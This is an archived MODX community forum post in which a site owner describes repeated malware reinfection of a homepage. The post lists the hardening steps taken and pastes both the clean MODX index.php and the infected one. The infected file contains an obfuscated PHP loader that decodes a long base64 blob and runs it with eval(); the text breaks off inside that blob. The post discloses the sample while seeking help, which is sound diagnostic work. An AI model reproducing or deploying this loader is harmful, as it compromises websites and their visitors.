We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
MODX Community Forums Archive

Answered MODx 2.6.5 site homepage keeps getting infected with malware

    • 32025
    • 305 Posts
    Dayton Web Design Reply #1, 5 years, 5 months ago
    I was running MODx version 2.5.8 and noticed I had Japanese Malware on my homepage. My website is located here: https://www.dayton-web-design.com/ (by the time you see this I might be infected again. Surprise, Surprise. I noticed a folder in my public_html labled "sitemap". It had around 8 files with Japanese writing. Also, the index.php file had some coding that was also malware.

    I could not find any other malware. So I deleted the "sitemap" folder and re-uploaded my non-tainted index.php from backup. The site was back up to normal so it seemed.

    After upgrading to the latest version (2.6.5) and hardening my site I followed these proceedures:

    1. SSL Installed (was installed all along).
    2. Moved core outside of public_html, renamed.
    3. Renamed: Manager and Connectors.
    4. Changed passwords on hosting, FTP, and MySQL database.
    5. Added .htaccess code to prevent snooping in folders without index file.
    5. Via .htaccess blocked all IP addresses of: Chinese, Japanese, Russian, and most Asian regions.

    While I was updating, I noticed the index.php would get infected a couple of times during all this securing and updating. This morning when I awoke, the malware was on my homepage again. Looked in ftp, and it only seems my index.php is getting infected (no other new files).

    This is the index.php file that is supposed to show (and I keep replacing):

    <?php
/*
 * This file is part of MODX Revolution.
 *
 * Copyright (c) MODX, LLC. All Rights Reserved.
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

$tstart= microtime(true);

/* define this as true in another entry file, then include this file to simply access the API
 * without executing the MODX request handler */
if (!defined('MODX_API_MODE')) {
    define('MODX_API_MODE', false);
}

/* this can be used to disable caching in MODX absolutely */
$modx_cache_disabled= false;

/* include custom core config and define core path */
@include(dirname(__FILE__) . '/config.core.php');
if (!defined('MODX_CORE_PATH')) define('MODX_CORE_PATH', dirname(__FILE__) . '/NEWCORENAME/');

/* include the modX class */
if (!@include_once (MODX_CORE_PATH . "model/modx/modx.class.php")) {
    $errorMessage = 'Site temporarily unavailable';
    @include(MODX_CORE_PATH . 'error/unavailable.include.php');
    header($_SERVER['SERVER_PROTOCOL'] . ' 503 Service Unavailable');
    echo "<html><title>Error 503: Site temporarily unavailable</title><body><h1>Error 503</h1><p>{$errorMessage}</p></body></html>";
    exit();
}

/* start output buffering */
ob_start();

/* Create an instance of the modX class */
$modx= new modX();
if (!is_object($modx) || !($modx instanceof modX)) {
    ob_get_level() && @ob_end_flush();
    $errorMessage = '<a href="setup/">MODX not installed. Install now?</a>';
    @include(MODX_CORE_PATH . 'error/unavailable.include.php');
    header($_SERVER['SERVER_PROTOCOL'] . ' 503 Service Unavailable');
    echo "<html><title>Error 503: Site temporarily unavailable</title><body><h1>Error 503</h1><p>{$errorMessage}</p></body></html>";
    exit();
}

/* Set the actual start time */
$modx->startTime= $tstart;

/* Initialize the default 'web' context */
$modx->initialize('web');

/* execute the request handler */
if (!MODX_API_MODE) {
    $modx->handleRequest();
}


    This is the infected index.php file that is somehow being replaced:

    <?php

@set_time_limit(3600);

@ignore_user_abort(1);

$xmlname = 'mapss144.xml';

$jdir = '';

$smuri_tmp = smrequest_uri();

if($smuri_tmp==''){

	$smuri_tmp='/';

}

$smuri = base64_encode($smuri_tmp);

$dt = 0;

function smrequest_uri(){

	if (isset($_SERVER['REQUEST_URI'])){        

		$smuri = $_SERVER['REQUEST_URI'];        

	}else{

		if(isset($_SERVER['argv'])){       

			$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];     

		}else{      

			$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];        

		}

	}        

	return $smuri;        

} 





$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iTHNZbW9la1FjVnRFUkJiSXJaSmZ4aGxqcVNYdXZIeWl6S1RwZ2FPd25kRk1QQ0FOV0dEVXN3dlVBallnSWtvcnluSHRKYVJTTWZYTEtFdWVEQlFsVk9QeFd6TmRwcUNabVRHYmloRmNtRjlkekJHV0ZnQWJUVzBPUkJ5WEh1R1dtRW5HUkM5QnlreUhSM2JvcWhrb0lUcXFOZDBPUmhxRHEya2x0RjBXUjJhRElweTVzaTV4SFVjTXNVYkF6aTVmemg5MHZ1UjFzVVJ4YVRJN0ZnQVl6aWdXbUVuR1JDOUJ5a3lIUjNib3ppZ3B1UHdXRmdBWUkyWDBhRUc5dHJHWXUwcUNrQ3dwSTIxVnp1eVhSMTA3RmdBWUloQ3BhRUc5dHJHWXUwcUNrQ3dwSTIxZHZpcVhSMTA3RmdBWUkyWDBhRUc5dEJiMElYOVFhdW53dmliWE9USURSUWRwUlFkWUkyWDBhRVk3RmdBWXpoOVZxVEc5dFR5U2Mwa0VrWWtFaVFxdGtDeWd1MGZtYzFncHVQd2JUbHlMSGg5THpRRzl0VElwTmQwT0ZnQVlxaGtvSUJxWHZsRzl0ckdZdTBxQ2tDd3BxaGtvSUJxWHZscXFOZDBPUkJ5WEh1bjNhaXRXbUVuVnFCUlNJVWtkSGhDTGFFV3BzUUl3UlFJd1JCeVhIdW4zYWl0eE5kME9GZ3h4YWxXWXFoa29JQnFYdmxYN0ZnQVJSQmJ4cWhjV21FR1lxaGtvSUJxWHZYd2R1RTRZcWhrb0lCcVh2WHdNdUU0WXFoa29JQnFYdlh3UXVQd2JUV1lZcWhrb0lURzl0QmIxdnBiMElsV1lxaGtvSUJxWHZsZFZPUHdiVHAwYlRXME9GZ0FZSGhDZWFRRzl0VHlTYzBrRWtZa0VpUVJ0a0N5Z3UwQ0ZnMGtna0M5WmdjNUJrY0NCeUVScU5kME9SaE1mSFVJV21Fbmx2dWJYYkx5U2FpNUxIMnlYT1R5d3ZpNXBPUHdiVGx5RElRRzl0VHlTYzBrRWtZa0VpUXF0a0N5Z3Uxa1B5a1JTZ2NxQ1BYZ3B1UHdiVGx5RElRRzl0aFJmSTJjMmJDOVhIVWJEYWhjQVJoOVZPUHdiVFVYVU9oWFZJMmswT1R5U2Mwa0VrWWtFaVFxdGtDeWd1MVJDeVlrRXlrdHB1RVl4amQwT3RUR1d0VHkxSVVNVnpoQ2VhUUc5dFR5U2Mwa0VrWWtFaVFxdGtDeWd1MVJDeVlrRXlrdHB1UHdiVGxHV3RUR1lxdVJ3STJmZkhVSVdtRW5sdnViWGJMeVNhaTVMSDJ5WE9UeTFJVU1WemhDZWFRWTdGZ3g5YWlNVmF1d2JUV1lZcXVSd0kyZmZIVUlXbUVHcFJWd2JUcDBiVFcwT3ppdkFhMmswYWk1Mk9UcUV5YzFta3JrU2djeXJjbEl4dFR2VXRCYjBJVWJmSTJrTEh1R0FhMmswYWk1Mk9UcUV5YzFta3JrU2djeXJjbEl4c1RHcHFpNUpIVTkzSGxJeE9FbjdGZ0FZdjJNRHYyd1dtRW5wYXV5WEhwdkFSMVJDUGM5Y3lrOW55cnlFUlFZN0ZneDl0aGt3STJreGFsZnhJM2JYcVRXWXUxYkNjWGFDY1h3cGNZa2JQMXlDdTBDcnlDdHB1RVlXUmx2V1JDOVB5a1JpeWtSSFIxUkNQYzljeWs5bnlyeUVSMTBXUmx2V0kzeVF2MkNWYWlib0lUV1l1MWJDY1hhQ2NYd3BjWWtiUDF5Q3UwQ3J5Q3RwdUVkV1Iza2V6MjVEcTI0cE9FWVdqZDBPUmhid0gyYkp0RjBXUkM5UHlrUml5a1JIUjFSQ1BjOWN5azlueXJ5RVIxMDdGZ3g5RmdBYlRseUFxQnlkdTJid0gyYkp0RjBXUlFJN0ZneHhhbGZwYXV5WEhwdkFSMGZja0NuU2cwTVJ5YzVjdTBYZ1JRWVdSbHZXSTN5UXYyQ1ZhaWJvSVRmcGF1eVhIcHZBUjBmY2tDblNnME1SeWM1Y3UwWGdSUVl3dFRxMUhVb2VIM3FlUlFZeHRCd2JUbHlBcUJ5ZHUyYndIMmJKdEYwV2EyazBhaTUyT1RxdGtDeWd1MGJaRWNrTmtDOVJjVEl4TmQwT1NFblhIQmJYeml2QWEyazBhaTUyT1RxdGtDeWd1MWZTeVk5RWswQ0V5cmtydTBhbWNsSXh0VHZVdEJiMElVYmZJMmtMSHVHQWEyazBhaTUyT1RxdGtDeWd1MWZTeVk5RWswQ0V5cmtydTBhbWNsSXhzVEdwcWk1SkhVOTNIbEl4T0VuN0ZnQVl6QnkwSUM5TEhoOUx6UUc5dGhxWHFoa2VxbFdwRUN5Y2NDOXZ1MGFtY1hxbmNZeUN5QzloUDF0cE9Qd2JUcDBiVFcwT3ppdkFJM3lRenViMElsV1l2Mk1EdjJ3d1JRZHBPRVg3RmdBUlJoYndIMmJKdTN5b0lURzl0aGs0SWhNRGFoY0F0bGRsc1R5TEhoOUx6UVk3RmdBUlJoYndIMmJKdEYwV1JoYndIMmJKdTN5b0lDd2R1UHdiVHAwYlRXME96aXZBSTN5UXp1YjBJbFdZSTIxMUlVWFNxaDFkc1RJZXYzYlZSUVl4amRZYlRXWVlxMmtsdEYwV1IyZjBxQkc2c1E4cHNseXBIM3FYdmw0cHMyWGVhaGs0c3BuQUlGOTFJVWQ5UlE0WUkyWDBhRTRwUlVYWW1FSWVSaFhZc2xJVXFoa29JRjBwc2x5MGFpMWRzbElVYUJnOVJRNFlhQmdlUlFhM2FpdDlSUTRZemg5VnFUNHBScHg2bUVJZUkyMXhJMlJEcVRXeHNsSVV6VXl4SUwwcHNseUthaFhRc2xJVXYyTUR2Mnc5UlE0WXYyTUR2MndlUlFhMUlVWTlSUTRZSTIxMUlVWWVSUWF3dmk1cG1FSWVSaE1mSFVJZVJRYURJVjBwc2x5RElRNHBScGtRSEJiQXZpNXBtRUllUkJrUUhCYkF2aTVwc2xJVXpCeTBJQzlMSGg5THpWMHBzbHlBcUJ5ZHUyYndIMmJKTmQwT1RFeUFxaDF3dTJiREhweVhIcGdXbUVuMElVWG9PQmJvSDNrMGFoOEFSQnFYdmxZeE5kWWJUV1h4YWxXZkkzeVFJM3lRT1R5QXFoMXd1MmJESHB5WEhwZ3dSMjVEdlU5MHF1YlhJVUNwYWk1MFJRWXhqZFliVFdZUnppdkFJM3lRSTN5UU9UeUFxaDF3dTJiREhweVhIcGd3UjI5SnpCeW9IaHFYcWhiREhweVhIcGdwT0VYN0ZnQVJUZ1hHemhrZmFoa1FPVFJGSDI1MGFpNTBzdXk1SWhjNnRCeVhqQmdEdjNiVk5Rbkx6aENRSTJrMG11azBhbDA0dGxZN0ZnQVJUZ1lZekJ5b0hDOUxIMjUwYWk1MHRGMFdJM3lRdTNSWEloTWZ2MmNBdFU5SnpCeW9IaHFYcWhiREhweVhIcGdsc1RJcHNUeUFxaDF3dTJiREhweVhIcGd4TmRZYlRXWVJUaWtMemg4V1JoZjBIaU1TdjI5ZXFoa2VxRndSVGdZUkZnQVJUZ1hYamhYME9UWTdUZzBPVGdYOWFpTVZhRW54YWxmVnFCUlZxQnRBUmhmMEhpTVN2MjllcWhrZXFUZHBhMmswdjI5ZXFoa2VxRmNkWkJuZmEyY3BPRVg3RmdBUlRnWEd6aGtmYWhrUU9UcXRrQ3lnc1ZyZVpFRzFaRkdXRWk1MGF1UmV2aWRXYzJrUXFVa1F0cmtRSVU5UVJRWTdGZ0FSVGdYWGpoWDBPVFk3RmdBUlR1MVhIQmJYdGhYVU9CYjBJcGIwSWxXWXpCeW9IQzlMSDI1MGFpNTBzVHFwYXV5TEgyNTBhaTUwYkZHMEloQ3BhRUl4T3V3YlRXWVJUY25BYWlDWWF1dEFSMGZja0NHRFpFNE10RmdkYlRuTkgzZ1d5VTkxSFVncE9Qd2JUV1lSVGlrNHp1Z0FPUHdiVFdZUlNnME9UZ1lSVGdZUkZnQVJTZ1lSRmd4OUZnQWJUVWt3STJjV3ppdkFSQmJ4cWhjeGpRR2JUV1h4YWxXWUkyWDBhRUc5bUVHcGpoMXdSUVg3RmdBUlRjbkFhaUNZYXV0QXRZYkRIcHlYSHBnb3FCWGRhUEFXcWhrNHFUOUFxaDF3TlFuTHpoQ1FJMmswbXVrMGFsMDR0bFk3RmdBUlRFeW92dW5ZenV0V21FbkdSQzlCeWt5SFIyMWZJaHl4SWxxcU5kME9UZ1lZSGlDZHFCWGRhRUc5dHJHWXUwcUNrQ3dwSGlDZHFCWGRhRXFxTmQwT1RnWVlhVVh3YXV5NUloY1dtRW5HUkM5QnlreUhSMmF4SGhrMGp1blhSMTA3RmdBUlRFeW92dW5TSTNud3p1eVZ1MjUxSEVHOXRyR1l1MHFDa0N3cEhpQ2R1M2JkSGhYMEkxOWVxaTBwdVB3YlRXWVJSaDFmSUM5ZXFpMFdtRW5HUkM5QnlreUhSMjFmSUM5ZXFpMHB1UHdiVFdZUlJoeWZxaENOYXVJV21FbkdSQzlCeWt5SFIyeWZxaENOYXVJcHVQd2JUV1lSeml2QVJoMWZJaHl4SWxYN0ZnQVJUZ1h4YWxXZnp1YlNhaFhRT1R5b3Z1bll6dXR4T3V3UkZnQVJUZ1lSZ2gxSmFoWFFPVHlvdnVuWXp1dHdaRkkzYlFNMElwa1hPUHdiVFdZUlRnWFh2MmZEdFRxRHpRR3BzbHlvdnVuWXp1dGVSUW5WcWliTGF1YlZ0UE1sSUw0cE5RR2JUV1lSVHUxWEhCYlhqZDBPVGdZUlRpa0x6aDhXUmgxZkloeXhJbDRwdGhDd0lVa2ZhQllXYXVmeEkzZ2ZtaFJRbWxJN0ZnQVJUZ1g5RmdBUlR1MFJUZzBPVGdYeGFsZkdSQzlCeWt5SFIyMWZJaFhlYWhrNFIxMHhqZDBPVGdZUlJoYXhIaGtmSXBSZmpFRzl0aE14STN5cnp1dEFSaDFmSWh5eElsWTdGZ0FSVGdYeGFsZkxIM2tlcVRXWWFVWHdhaUNRSVVDNU9QNDlabFg3RmdBUlRnWVJSaDFmSWhYZWFoazR1M2IwSWxHOXRUSXBOZDBPVGdZUlRFeW92dW54SFV5WGpDOVZxQnRXbUVHcG1GOTRIaWRXcVVrUUkyWERITDBsWkU0ZHRsblhIVWJEYWhYZWFWMGxra3loc1BXbG1WNGJUTE1WenV5WEhpQ2R6aTVZYXVXV2poMXdIcFo5dFVmMHFCRzZzUTkzcTNJZWEyOURhMk1Yc1ViREhFOVZ2MmZYSGlDVnMzYnhxaGtvdnVHRFpUNDRiVHQrUlZ3YlRXWVJUZ1hVSDNSWHZpYkFPVHlVemlNWHZ1UlF2dVlXdnVaV1JCYWZIQmtYT3V3YlRXWVJUZ1lSeml2QUkzeVF6dWIwSWxXWXFVQ3dxaWN3UlE1NEhpZHBPRVg3RmdBUlRnWVJUZ1lZSGlDZHppNVlhdWZTSTN5UXRUNDl0VEliVGxHV21CYnhxaGtvdnVHK0ZnQVd0VEdXbWhNRHZWNHBzbFJBcUJ5ZE5sOER0bDRZdTFiQ2NYYUNjWHdwRUN5Y2NDOXRQMWJjUjEwZXRsOGxzbHlvdnVuWXp1dGVSUThwc2x5MnZpTTFhRTRwbVQ5d0gyWitGZ0FXdEZkREkyWDBhaTFmSUY0cE5kME9UZ1lSVGdYOUZnQVJUZ1lSU2cwT1RnWVJURXlvdnVueEhVeVhqQzlWcUJ0V3NMMFdSZDBPbVQ5Vnp1eVhIaUNkemk1WWF1VytSVndiVFdZUlRnWVlqaDF3SFVDb2FFRzl0ckdZdTBxQ2tDd3BIaUNkemk1WWF1V3B1RTRwc3Bmb0hUSTdGZ0FSVGdZUlJoMTVhVVh3YUVHOXRoYURJaGtlT1R5NEhpTWV2aTFYc1RHbHFRdHhOUUdiVFdZUlRnWFVxM1J4cWhjQVJoMTVhVVh3YUVkV1JoMWZJaFhlYWhrNHUzYjBJbFk3RmdBUlRnWVJhVWJ3SDNiWE9UeW9qaWF4SGhjeE5RR2JUV1lSVGdYWHYyZkR0VFJEelZNbElMNUFxQnlkTmw4RHRsNFl1MWJDY1hhQ2NYd3BFQ3ljY0M5dFAxYmNSMTBldGw4bHNseTRIaU1ldmkxWE5RR2JUV1lSVGdZRHMya0x6aDhXdExNbElMNGxzbHkzYWl0N0ZnQVJUZ1lSYXVmeHFGd2JUV1lSVHUxWEhCYlhqZDBPVGdZUlRpa0x6aDhXUjNmb0hUblV6aU1YdGhNWEkzWldIcGtvdlVrUXRoMWZJaFhlYWhrNHRoYWZ6aU1YdEVJN0ZnQVJUZ1lSYXVmeHFGd2JUV1lSVHUwYlRXWVJTZzBPVGdZYlRXWVJGZ0FSVEV5M2FpdFdtRUdwekJ5MElGQURzUUllUmhxRHEya2xzbElESTJYMGFpMWZJVDVkekJHL2FoQzBhUDBwc2x5eGFUNHBScHlYSHVHOVJRNFlxaGtvSVQ0cFJwcVh2TDBwc2x5QUgzYjBzbElVamgxd21FSWVSaHkwc2xJVUhpQ2RxQlhkYVAwcHNseW92dW4wanVuWHNsSVVhVVh3YXV5NUloYzlSUTRZYVVYd2F1eTVJaGNlUlFhb3Z1blNJM253enV5VnUyNTFIUDBwc2x5b3Z1blNJM253enV5VnUyNTFIRTRwUlUxZklDOWVxaTA5UlE0WUhpQ2R1MjUxSEU0cFJVeWZxaENOYXVJOVJRNFlhaEMwdmM1WHFWd1dGZ0FSVGlYVU9CYjF2cGIwSWxXWXFoa29JVGRkc0ZXeG1QMHBJMmZYSGhNNEhpZHBPdXdiVFdZUlRFeTRIaU1ldmkxWHRGMFdJM2tsSTN5UU9UeTBhaTFkc0ZXeHNsSWVqaDF3UlZ3YlRXWVJTZzBPVGdYeGFsZlZxaVJWcUJ0QVJCeVhIdUd3WlRkM09QMDlSMmZmdjJvNEhpZHBPdXdiVFdZUlRpWFVPQmIxdnBiMElsV1lxaGtvSVRkM09FWDdGZ0FSVGdZUlJCZm9IaDVmSGljV21FblZxaVJWcUJ0QVJCeVhIdUd3YlFZZVJRNTRIaWRwTmQwT1RnWVJTZ1lSVGcwT1RnWDlGZ0FSVGlYVU9yR1l1MHFDa0N3cEhpQ2RhaFhRUjEweGpkME9UZ1lSeml2QVJoYXhIaGswanVuWG1QME1PdXdiVFdZUlRnWVlqaDF3SFVDb2FFRzl0VHk0SGlNZXZpMVhzbEllYTNBcE5kME9UZ1lSU2lrd0kyY1d6aXZBUmhheEhoazBqdW5YbVAwUU91d2JUV1lSVGdYeGFsZlVxaTVMcWhYREhYOVhqaFhWcUJaQVIycTZIM25YSGxJeE9FbjdGZ0FSVGdZUlRFeTRIaU1ldmkxWHRGMFdSQmZvSGg1ZkhpY2VSUTVwamxJN0ZnQVd0VEdXdFRHV3RUR1d0VEdXdFRHV3RUR1d0aFhVT1R5VUlURzl0aHE2SDNuWEhsV1lIaUNkYWhYUXNsSURSUTRZamgxd0hVQ29hRWRXUjNJNVJRWXhqZDBPdFRHV3RUR1d0VEdXdFRHV3RUR1d0VEdXdFRHV3RUR1dSQmZvSFRHOXRCeVF6aTBBSTIxRHF1eVlIUVdZcTJrbE9FWTdGZ0FXdFRHV3RUR1d0VEdXdFRHV3RUR1d0VEdXdFRHV3RUR1lhcEdXbUVucGpVOWRhaTRXT1R5b3Z1bll6dXRlUlE4cHNseTRIaU1ldmkxWHNUR3BxVllwT1B3YlRsR1d0VEdXdFRHV3RUR1d0VEdXdFRHV3RUR1d0VEdXdGhxNnEzUnhxaGNXT1R5VUlUZFdSQmZvSFRZN0ZnQVd0VEdXdFRHV3RUR1d0VEdXdFRHV3RUR1d0VEdXdFRucGpVYndIM2JYT1R5VUlUWTdGZ0FXdFRHV3RUR1d0VEdXdFRHV3RUR1d0VEdXdFRHV3RUblh2MmZEdFRSRHpWTWxJTDVBcUJ5ZE5sOER0bDRZdTFiQ2NYYUNjWHdwRUN5Y2NDOXRQMWJjUjEwZXRsOGxzbHlvdnVuWXp1dGVSUThwc2x5NEhpTWV2aTFYTmQwT3RUR1d0VEdXdFRHV3RUR1d0VEdXdFRHV3RUR1d0VEdXYWliQUhRR2xtaFJRbWx0ZVJCcVh2THdiVGxHV3RUR1d0VEdXdFRHV3RUR1d0VEdXdFRHV3RUR1d0aGs0enVnQU9Qd2JUV1lSVGdZUlNpa3dJMms3RmdBUlRnWVJUZ1hwalVid0gzYlhPVHlVSVRZN0ZnQVJUZ1lSVGdYWHYyZkR0VEk4YVU5ZXFUblZxQlh3YVAwbHYyOXdIM3Q2SVVrWXRMNUxJVWtmcVRuVnp1eVhIaUNkdGhhZnppTVh0cjVEdENuWElVMXhJM2J4SDI1VnRQZERhVTllcUY0OHZwdCt6QnkwSUZBRHNRSWVSQzlQeWtSaXlrUkhSMGZja0NuU0VyOVBrVHFxc2x0RHRsNFlIaUNkYWhYUXNsSURSUTRZamgxd0hVQ29hUHdiVFdZUlRnWVJUaWtMemg4V3RMTWxJTDRsc2x5M2FpdDdGZ0FSVGdZUlRnWFhqaFgwT1RZN0ZnQVJUZ1lSVHUwYlRXWVJUZ1g5YWlNVmF1d2JUV1lSVGdZUmFpYkFIUUdwbWhhREhwZ1dJM3k1SGhjOXRVYkRIaDlRTnBSWGFUdCthM3hESWhrZXRoNUR0aGs0enViMElRcjhzMmFESHBnK21oUlFtVWYwcUJHNnNROHBzbHlTYzBrRWtZa0VpUXF0a0N5Z3UwZm1jMWdwdUU0bHNRdGVSaDFmSWh5eElsNHBzUUllUkJmb0hoNWZIaWM3RmdBUlRnWVJURXkzYWl0V21FR3B6QnkwSUZBRHNRSWVSaHFEcTJrbHNsSURJMlgwYWkxZklUNWR6QkcvYWhDMGFQMHBzbHl4YVQ0cFJweVhIdUc5UlE0WXFoa29JVDRwUnBxWHZMMHBzbHlBSDNiMHNsSVVqaDF3bUVJZVJoeTBzbElVSGlDZHFCWGRhUDBwc2x5b3Z1bjBqdW5YTmQwT1RnWVJUZ1hYdjJmRHRUdDh2cHQrdGw0WXEya2xOZDBPVGdZUlRnWFhqaFgwT1RZN0ZnQVJUZ1lSU2cwT1RnWVJTZzBPVGdZUnppdkFhVTlkYWk0QVJoMWZJaHl4SWw0cHNRSWVSQmZvSGg1ZkhpY3d0VFIzdGxZeGpkME9UZ1lSVEV5NEhpZFdtRW4wSVVYb09CYm9IM2swYWg4QVJCcVh2bFl4TlFHYlRXWVJUZ1lZSHVYVXppTVh0RjBXYVU5ZGFpNEFSaDFmSWh5eElsNHBzUUllUkJmb0hoNWZIaWN3dFRSM3RsWTd0RzBPVGdZUlRpYTNJVVgwYUVXWUh1WFV6aU1Yc1RHWWpoMXdPUHdiVFdZUlRnWFV2Mk1ESTJjQVJoMTVhVVh3YUVZN3RHME9UZ1lSVGlrTHpoOFd0VTlKbWhSUW1VZjBxQkc2c1E4bHNseVNjMGtFa1lrRWlRcXRrQ3lndTBmbWMxZ3B1RTRsc1F0ZVJoMWZJaHl4SWw0cHNRSWVSQmZvSGg1ZkhpYzd0RzBPVGdZUlRpa0x6aDhXdExNbElMNGxzbHkzYWl0N0ZnQVJUZ1lSYXVmeHFUV3hOZDBPVGdZUlNpa3dJMms3RmdBUlRnWVJhVWJ3SDNiWE9UeW9qaWF4SGhjeE5kME9UZ1lSVGlrTHpoOFdSVk1VSDI1MHRCYjBqaU1YbUVSTEgyTURJTHhRYWlnbG1VYlFhaUMwdEJieHFoa292dUdXYVVDeEhoY1dQVThXY2hrUUhpWFZJMlhESHBaZm1UOVVIMjUwbUxNbElMNUFxQnlkTmw4RFJRNFl1MWJDY1hhQ2NYd3BFQ3ljY0M5dFAxYmNSMTBldGw4bHNseW92dW5ZenV0ZVJROHBzbHk0SGlNZXZpMVhOUUdiVFdZUlRnWFh2MmZEdFR0OHZwdCt0bDRZcTJrbE5kME9UZ1lSVGlrNHp1Z0FPUHdiVFdZUlR1MGJUV1lSU2lrd0kyazdGZ0FSVGdYeGFsZlVIM25YSGxXWWpoMXdIVUNvYUVkV3RwSWxPRVg3RmdBUlRnWVJSQmZvSFRHOXRCeVF6aTBBSTIxRHF1eVlIUVdZcTJrbE9FWTd0RzBPVGdZUlRFeW9qaWF4SGhjV21FblVIM25YSGxXWWpoMXdIVUNvYUVkV3RwSWxPUHdXRmdBUlRnWVJhcHFRenV5WE9UeW9qaWF4SGhjd3RUeTRIaWR4TmQwT1RnWVJUaWFMSGg5VmFFV1lIdVhVemlNWE9Qd1dGZ0FSVGdZUmFpYkFIUUdsSDJ3OHZwdCt6QnkwSUZBRHNRdGVSQzlQeWtSaXlrUkhSMGZja0NuU0VyOVBrVHFxc2x0RHRsNFlqaDF3SFVDb2FQd1dGZ0FSVGdZUmFpYkFIUUdsbWhSUW1sdGVSQnFYdkx3YlRXWVJUZ1hYamhYME9UWTdGZ0FSVGdYOWFpTVZhdXdiVFdZUlRnWFV2Mk1ESTJjQVJoMTVhVVh3YUVZN0ZnQVJUZ1lSYWliQUhRR3BtaGFESHBnV0kzeTVIaGM5dFViREhoOVFOcFJYYVR0K3YzUlh2dWdXSTJYMGFpMWZJVG5VdmlYd2FFbk5IUW5nYXVSb3p1YlZ6aTllSVFyOHMyYURIcGcrbWhSUW1VZjBxQkc2c1E4cHNseVNjMGtFa1lrRWlRcXRrQ3lndTBmbWMxZ3B1RTRsc1F0ZVJCZm9IaDVmSGljN3RHME9UZ1lSVGlrTHpoOFd0TE1sSUw0bHNseTNhaXQ3RmdBUlRnWVJhdWZ4cVRXeE5kME9UZ1lSU2cwT1RnWDlGZ0FiVFcwT1R1MFJGZ0FSeml2QVJoWFlPdXdiVFdZUmdoZlh2aXlYSWxXbGcyOWVxaGtlcVQxMGp1blhObG4wYXVmMHMyZjBIaWQ3dGhiQXZ1UlZhdWc5cXV5VXNQV2xPUHdiVFdZUlJCcVh2bEc5dFRxQXFCeWRObDhEUlE0WWEyOTNhaXRlUlE5eEhVeVhqVDVkekJHL3F1UndtRUllUkJieHFoY2VSUWF4YUYwcHNseXhhVDRwUnB5WEh1RzlSUTRZcWhrb0lUNHBSVXkwbUVJZVJoeTBzbElVcTJrbG1FSWVSaGZESTNnZVJRYTZqTDBwc3Bib3p1YmxIM2dBT0U0cFJVeFl6dXQ5UlE0WXpVeXhJbDRwUlVid0gyYkptRUllUmhid0gyYkpzbElVcXVSeG1FSWVSQmJvcXVSeHNsSVVIaENlYVYwcHNseXd2aTVwc2xJVUgzWjlSUTRZSDNaZVJRYTFJVU1WemhDZWFWMHBzbHkxSVVNVnpoQ2VhUTRwUlVmMHFCblN2Mk1EdjJ3OVJRNFl6QnkwSUM5TEhoOUx6UTRwUnBuZmEyYzlSUTRZSWhDcGFQd2JUV1lSUmhmMEhpTVN2MjllcWhrZXFURzl0QnlRemkwQUkyMURxdXlZSFFXWXEya2xPRVk3RmdBUlRpWFVPVENWcUJSVnFCdEFSaGYwSGlNU3YyOWVxaGtlcVRkcEhVOWxIM3kxSTJrUXZpcVhIcGdwT0VYN0ZnQVJUZ1h4YWxmVnFCUlZxQnRBUmhmMEhpTVN2MjllcWhrZXFUZHBIMm9BcWgxd2EyazB2MjllcWhrZXFUSXhPdXdiVFdZUlRnWVl6QnlvSEM5TEgyNTBhaTUwdEYwV0kzeVF1M1JYSWhNZnYyY0F0VTlKekJ5b0hocVhxaGJESHB5WEhwZ2xzVElwc1R5QXFoMXd1MmJESHB5WEhwZ3hOZDBPVGdZUlRpa0x6aDhXUmhmMEhpTVN2MjllcWhrZXFGd1JUZ1liVFdZUlRnWFhqaFgwT1RZN0ZnQVJUZ1g5YWlNVmFFbnhhbGZWcUJSVnFCdEFSaGYwSGlNU3YyOWVxaGtlcVRkcGEyazB2MjllcWhrZXFGY2RaQm5mYTJjcE9FWDdGZ0FSVGdZUmdoZlh2aXlYSWxXcEVDeWNjVDhNc0xyV2JQR2R0clhlcWhrUUhVQ3d0Q2JYSXBhWElsbkNJcFJESWxJeE5kME9UZ1lSVGlrNHp1Z0FPUHdiVFdZUlR1MVhIQmJYdGhYVU9CYjBJcGIwSWxXWXpCeW9IQzlMSDI1MGFpNTBzVHFwYXV5TEgyNTBhaTUwYkZHMEloQ3BhRUl4T3V3YlRXWVJUZ1hHemhrZmFoa1FPVHF0a0N5Z3NWcmVaRUcwWkZnV1BVOTB0cmFEcWk1WVJRWTdGZ0FSVGdZUmF1ZnhxVFd4TmQwT1RnWVJTZzBPVGdZUlRnWVJGZ0FSVHUwYlRXWDlGZ3g5YWlNVmF1d2JUV1liVFdZWXEya2x0RjBXUjJmMHFCRzZzUThwc2x5cEgzcVh2bDRwczJYZWFoazRzcG5BSUY5MUlVZDlSVVhZbUVJZVJoWFlzbElVcWhrb0lGMHBzbHkwYWkxZHNsSVVhQmc5UlE0WWFCZ2VSUWEzYWl0OVJRNFl6aDlWcVQ0cFJweDZtRUllSTIxeEkyUkRxVFd4c2xJVXpVeXhJTDBwc2x5S2FoWFFzbElVdjJNRHYydzlSUTRZdjJNRHYyd2VSUWExSVVZOVJRNFlJMjExSVVZZVJRYXd2aTVwbUVJZVJoTWZIVUllUlFhRElWMHBzbHlESVE0cFJwa1FIQmJBdmk1cG1FSWVSQmtRSEJiQXZpNXBzbElVekJ5MElDOUxIaDlMelYwcHNseUFxQnlkdTJid0gyYkpzbElVSWhDcGFQMHBzbHlkdmlxWE5kME9URXlBcWgxd3UyYkRIcHlYSHBnV21FbjBJVVhvT0Jib0gzazBhaDhBUkJxWHZsWXhOZDBPVGlYVU9UQ1ZxQlJWcUJ0QVJoZjBIaU